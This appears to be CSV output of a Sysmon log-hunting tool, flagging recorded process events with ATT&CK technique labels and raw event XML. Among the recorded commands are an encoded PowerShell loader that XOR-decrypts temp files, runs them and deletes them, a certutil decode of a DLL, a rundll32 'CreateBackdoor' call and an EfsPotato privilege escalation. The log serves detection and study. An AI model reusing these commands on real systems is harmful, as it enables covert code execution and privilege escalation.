JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 15:08:07.355 + 747F3D96-A357-5D45-0000-0010BD149A01 + 5396 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A356-5D45-0000-001014F99901 + 4056 + C:\Windows\System32\mmc.exe + "C:\Windows\System32\mmc.exe" eventvwr.msc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589296009.450298,2020-05-12T19:06:49.450298+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 143189 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-12 15:06:49.415 + 747F3D96-BB89-5EBA-0000-001019683600 + 4688 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B086-5EBA-0000-0020BF9E0800 + 0x89ebf + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-BB89-5EBA-0000-001042653600 + 1088 + C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe + C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil -f -decode fi.b64 AllTheThings.dll )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.940 + 747F3D96-660A-5D3F-0000-0010FFF28500 + 700 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16150 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 18:10:42.653 + 365ABB72-1022-5CD7-0000-0010DF121C00 + 3248 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-8693-5CD7-0000-0010765E0000 + 492 + C:\Windows\System32\lsass.exe + C:\Windows\system32\lsass.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1140] Deobfuscate/Decode Files or Information,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ) tried decoding file or information,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.940 + 747F3D96-660A-5D3F-0000-0010FFF28500 + 700 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.940 + 747F3D96-660A-5D3F-0000-0010FFF28500 + 700 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243512 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.504 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564834100.731416,2019-08-03T16:08:20.731416+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5447 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 12:08:19.888 + 747F3D96-7933-5D45-0000-0010227E0701 + 6000 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-7930-5D45-0000-001055DE0601 + 4740 + C:\Windows\System32\consent.exe + consent.exe 896 318 0000028064471300 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243512 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.504 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243512 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.504 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17717 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.342 + 365ABB72-28D0-5CDA-0000-0010F76F1300 + 3964 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17717 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.342 + 365ABB72-28D0-5CDA-0000-0010F76F1300 + 3964 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /priv) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 15678 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-10 13:33:29.409 + 365ABB72-7DA9-5CD5-0000-00100ED31400 + 2524 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /priv + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-79DF-5CD5-0000-0020F8410100 + 0x141f8 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-7D86-5CD5-0000-0010CC2E1400 + 2076 + C:\Windows\System32\cmd.exe + "c:\Windows\System32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1629660818.905645,2021-08-22T23:33:38.905645+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1912935 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-08-22 19:33:38.890 + 00247C92-A692-6122-0000-0010A5CD1F02 + 11328 + C:\Windows\System32\whoami.exe + 10.0.19041.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\WINDOWS\system32\ + NT AUTHORITY\SYSTEM + 00247C92-7087-6122-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=1915FBFDB73FDD200C47880247ACDDE5442431A9,MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 00247C92-A691-6122-0000-001021C31F02 + 14048 + C:\temp\EfsPotato.exe + c:\temp\EfsPotato.exe whoami + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435978.711831,2019-07-30T01:32:58.711831+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil -f -decode fi.b64 AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4888 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.614 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557495209.424885,2019-05-10T17:33:29.424885+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 15677 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-10 13:32:54.034 + 365ABB72-7D86-5CD5-0000-0010CC2E1400 + 2076 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "c:\Windows\System32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-79DF-5CD5-0000-0020F8410100 + 0x141f8 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-7D85-5CD5-0000-001047061400 + 2536 + C:\Windows\System32\CompMgmtLauncher.exe + "C:\Windows\System32\CompMgmtLauncher.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1561018078.816185,2019-06-20T12:07:58.816185+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8119 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:52.956 + 365ABB72-3ED8-5D0B-0000-0010398F1A00 + 1476 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-3991-5D0B-0000-002029350100 + 0x13529 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-3ED4-5D0B-0000-0010B2871A00 + 1440 + C:\Windows\System32\cmd.exe + "cmd" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17715 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.290 + 365ABB72-28D0-5CDA-0000-00103A6B1300 + 2676 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17715 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.290 + 365ABB72-28D0-5CDA-0000-00103A6B1300 + 2676 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 